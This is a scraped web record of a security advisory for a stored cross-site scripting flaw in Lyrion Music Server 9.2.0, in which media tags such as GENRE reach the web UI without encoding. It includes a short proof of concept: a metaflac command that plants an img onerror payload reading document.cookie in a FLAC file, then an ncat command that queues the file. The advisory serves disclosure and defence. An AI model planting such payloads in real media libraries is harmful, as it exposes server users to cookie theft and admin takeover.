{“lastseen”:”2026-06-05T18:50:34″,”description”:”Summary Lyrion Music Server formerly Logitech Media Server, and often abbreviated as \\”LMS\\” is open-source software which can control and serve stream music to a wide range of physical and virtual audio players called Squeezeboxes. Lyrion Music Server…”,”published”:”2026-06-05T00:00:00″,”modified”:”2026-06-05T00:00:00″,”type”:”zeroscience”,”title”:”Lyrion Music Server 9.2.0 (metadata) Stored XSS”,”source”:””,”references”:””,”id”:”ZSL-2026-5990″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-50232″],”sourceData”:”\\u003chtml\\u003e\\u003cbody\\u003e\\u003cp\\u003eLyrion Music Server 9.2.0 (metadata) Stored XSS\\n\\n\\nVendor: LMS Community\\nProduct web page: https:\/\/www.lyrion.org\\nAffected version 9.2.0\\n\\nSummary: Lyrion Music Server (formerly Logitech Media Server, and\\noften abbreviated as \\”LMS\\” ) is open-source software which can control\\nand serve (stream) music to a wide range of physical and virtual audio\\nplayers called Squeezeboxes. Lyrion Music Server can stream your local\\nmusic collection, internet radio stations, and content from many streaming\\nservices (with and without subscriptions).\\n\\nDesc: Lyrion Music Server stores media file metadata tags (such as GENRE,\\nARTIST, and ALBUM) exactly as written in the file and later renders them\\nin its web interface without HTML-encoding, resulting in stored cross-site\\nscripting. An attacker who gets a file with a malicious tag into the victim’s\\nlibrary has their payload saved during the next library scan and executed\\nautomatically whenever a user views that track’s information or plays the\\nfile in the web UI. Because LMS is unauthenticated by default, the injected\\nscript runs with full access to the management interface, allowing admin\\ncommands, settings disclosure, and further exploitation.\\n\\nTested on: Windows 10 (64-bit) – EN\\n Lyrion Music Server (9.2.0 – 1779973211)\\n Perl\/5.32.1\\n SQLite\\n\\n\\nVulnerability discovered by Gjoko ‘LiquidWorm’ Krstic\\n @zeroscience\\n\\n\\nAdvisory ID: ZSL-2026-5990\\nAdvisory URL: https:\/\/www.zeroscience.mk\/#\/advisories\/ZSL-2026-5990\\nCVE ID: CVE-2026-50232\\nCVE URL: https:\/\/www.cve.org\/CVERecord?id=CVE-2026-50232\\n\\n\\n27.05.2026\\n\\n–\\n\\n\\n$ metaflac –set-tag=GENRE=\\”\\u003cimg onerror=\\”alert(document.cookie)\\” src=\\”1\\”\/\\u003e\\” evil.flac\\n$ metaflac –list evil.flac\\nMETADATA block #0\\n type: 0 (STREAMINFO)\\n is last: false\\n length: 34\\n minimum blocksize: 4608 samples\\n maximum blocksize: 4608 samples\\n minimum framesize: 2305 bytes\\n maximum framesize: 14124 bytes\\n sample_rate: 44100 Hz\\n channels: 2\\n bits-per-sample: 16\\n total samples: 4664587\\n MD5 signature: 2aeee69c0153cb652c718dfdf0e9ff2d\\nMETADATA block #1\\n type: 4 (VORBIS_COMMENT)\\n is last: false\\n length: 98\\n vendor string: Lavf57.83.100\\n comments: 2\\n comment[0]: encoder=Lavf57.83.100\\n comment[1]: GENRE=\\u003cimg onerror=\\”alert(document.cookie)\\” src=\\”1\\”\/\\u003e\\nMETADATA block #2\\n type: 1 (PADDING)\\n is last: true\\n length: 8140\\n\\n$ ncat localhost 9090\\nplaylist add file:\/\/\/music\/evil.flac\\n\\u003c\/p\\u003e\\u003c\/body\\u003e\\u003c\/html\\u003e”,”sourceHref”:”https:\/\/www.zeroscience.mk\/codes\/lyrion_xss2.txt”,”cvss”:{“score”:7.2,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:C\/C:L\/I:L\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.zeroscience.mk\/advisories\/ZSL-2026-5990.html”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-06-05T18:50:34″,”description”:”Summary Lyrion Music Server formerly Logitech Media Server, and often abbreviated as \\”LMS\\” is open-source software which can control and serve stream music to a…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,39,12,15,13,7,11,5,107],"class_list":["post-60316","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-72","tag-exploit","tag-high","tag-news","tag-security","tag-tapic","tag-vulnerability","tag-zeroscience"],"yoast_head":"\n